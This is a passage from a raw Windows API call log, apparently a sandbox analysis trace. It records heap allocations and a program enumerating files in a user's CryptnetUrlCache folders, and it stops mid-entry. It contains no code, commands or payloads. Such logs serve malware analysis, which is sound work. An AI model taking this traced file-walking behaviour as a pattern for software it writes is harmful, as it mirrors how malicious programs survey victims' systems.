RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.714] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0203.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0203.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.714] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0203.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0203.715] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0203.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0203.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.716] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0203.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea20f8 [0203.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.716] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0203.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea20f8 | out: hHeap=0x620000) returned 1 [0203.717] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0203.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.717] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0203.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.718] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0203.718] PathFindFileNameW (pszPath="") returned="" [0203.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0203.718] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0203.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0203.721] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.721] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5d876470, ftCreationTime.dwHighDateTime=0x1d706ad, ftLastAccessTime.dwLowDateTime=0x5d876470, ftLastAccessTime.dwHighDateTime=0x1d706ad, ftLastWriteTime.dwLowDateTime=0x5d876470, ftLastWriteTime.dwHighDateTime=0x1d706ad, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0203.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0203.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0203.722] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0203.722] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xab8c1ed0, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xab8c1ed0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xab8c1ed0, ftLastWriteTime.dwHighDateTime=0x1d706ae, nFileSizeHigh=0x0, nFileSizeLow=0x475, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0203.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0203.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0203.722] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37C951188967C8EB88D99893D9D191FE") returned="" [0203.722] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1aa3080, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x1aa3080, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacdd5700, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x12d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0203.722] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0203.722] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x794f7e10, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x794f7e10, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacf2c360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0203.722] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0203.722] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7c71ad70, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7c71ad70, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x7c71ad70, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0x234, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0203.722] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0203.723] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4eb51c0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x4eb51c0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x6a399090, ftLastWriteTime.dwHighDateTime=0x1d706ac, nFileSizeHigh=0x0, nFileSizeLow=0xe6fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0203.723] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0203.723] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4e42da0, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0203.723] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0203.723] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0203.723] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0203.723] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xaeb57250, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xaeb57250, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xaeb57250, ftLastWriteTime.dwHighDateTime=0x1d706ae, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0203.723] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C0018BB1B5834735BFA60CD063B31956") returned="" [0203.723] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f963e30, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f963e30, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacfc48e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0203.723] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0203.723] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f963e30, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f963e30, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacfc48e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0203.723] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0203.724] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0203.724] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0203.724] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0203.724] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0203.724] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0203.724] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0203.725] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0203.725] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0203.725] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0203.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.725] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0203.725] PathFindFileNameW (pszPath="") returned="" [0203.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.725] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0203.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.727] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.727] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5d876470, ftCreationTime.dwHighDateTime=0x1d706ad, ftLastAccessTime.dwLowDateTime=0x5d876470, ftLastAccessTime.dwHighDateTime=0x1d706ad, ftLastWriteTime.dwLowDateTime=0x6c7fca30, ftLastWriteTime.dwHighDateTime=0x1d706ad, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0203.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.728] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0203.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: 